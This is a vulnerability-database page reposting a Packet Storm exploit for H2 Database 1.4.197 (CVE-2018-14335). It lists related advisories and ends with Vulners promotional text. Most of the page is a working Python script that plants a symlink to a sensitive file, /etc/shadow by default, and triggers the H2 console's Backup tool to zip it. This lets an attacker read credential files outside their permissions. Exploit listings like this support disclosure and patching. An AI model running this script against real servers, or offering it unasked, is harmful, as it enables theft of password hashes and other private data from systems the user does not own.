Lucene search
K

H2 Database 1.4.197 Information Disclosure

🗓️ 30 Jul 2018 00:00:00Reported by owodeltaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 49 Views

H2 Database 1.4.197 Information Disclosure, Insecure handling of permissions allows symlink attack to read sensitive file

Related
Code
ReporterTitlePublishedViews
Family
0day.today
H2 Database 1.4.197 - Information Disclosure Exploit
30 Jul 201800:00
zdt
Broadcom
BSA-2022-1837
3 May 202200:00
broadcom
IBM Security Bulletins
Security Bulletin: H2 Database Vulnerabilities Affect IBM Control Center (CVE-2018-10054, CVE-2018-14335)
14 May 202121:25
ibm
Circl
CVE-2018-14335
30 Jul 201816:26
circl
CNVD
H2 Information Disclosure Vulnerability
26 Jul 201800:00
cnvd
CVE
CVE-2018-14335
24 Jul 201813:00
cve
Cvelist
CVE-2018-14335
24 Jul 201813:00
cvelist
Exploit DB
H2 Database 1.4.197 - Information Disclosure
30 Jul 201800:00
exploitdb
EUVD
EUVD-2018-6257
7 Oct 202500:30
euvd
exploitpack
H2 Database 1.4.197 - Information Disclosure
30 Jul 201800:00
exploitpack
Rows per page
`# Exploit Title: H2 Database 1.4.197 - Information Disclosure  
# Date: 2018-07-16  
# Exploit Author: owodelta  
# Vendor Homepage: www.h2database.com  
# Software Link: http://www.h2database.com/html/download.html  
# Version: all versions  
# Tested on: Linux  
# CVE : CVE-2018-14335  
  
# Description: Insecure handling of permissions in the backup function allows  
# attackers to read sensitive files (outside of their permissions) via a  
# symlink to a fake database file.  
  
# PS, thanks to HTB and our team FallenAngels  
  
#!/usr/bin/python  
  
import requests  
import argparse  
import os  
import random  
  
def cleanup(wdir):  
cmd = "rm {}symlink.trace.db".format(wdir)  
os.system(cmd)  
  
def create_symlink(file, wdir):  
cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)  
os.system(cmd)  
  
  
def trigger_symlink(host, wdir):  
outputName = str(random.randint(1000,10000))+".zip"  
#get cookie  
url = 'http://{}'.format(host)  
r = requests.get(url)  
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')  
url = '{}/{}'.format(url,path)  
payload = {  
"tool":"Backup",  
"args":"-file,"+wdir+outputName+",-dir,"+wdir}  
#print url  
requests.post(url,data=payload).text  
print "File is zipped in: "+wdir+outputName  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser()  
required = parser.add_argument_group('required arguments')  
required.add_argument("-H",  
"--host",  
metavar='127.0.0.1:8082',  
help="Target host",  
required=True)  
required.add_argument("-D",  
"--dir",  
metavar="/tmp/",  
default="/tmp/",  
help="Writable directory")  
required.add_argument("-F",  
"--file",  
metavar="/etc/shadow",  
default="/etc/shadow",  
help="Desired file to read",)  
args = parser.parse_args()  
  
create_symlink(args.file,args.dir)  
trigger_symlink(args.host,args.dir)  
cleanup(args.dir)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Jul 2018 00:00Current
6.8Medium risk
Vulners AI Score6.8
EPSS0.13389
49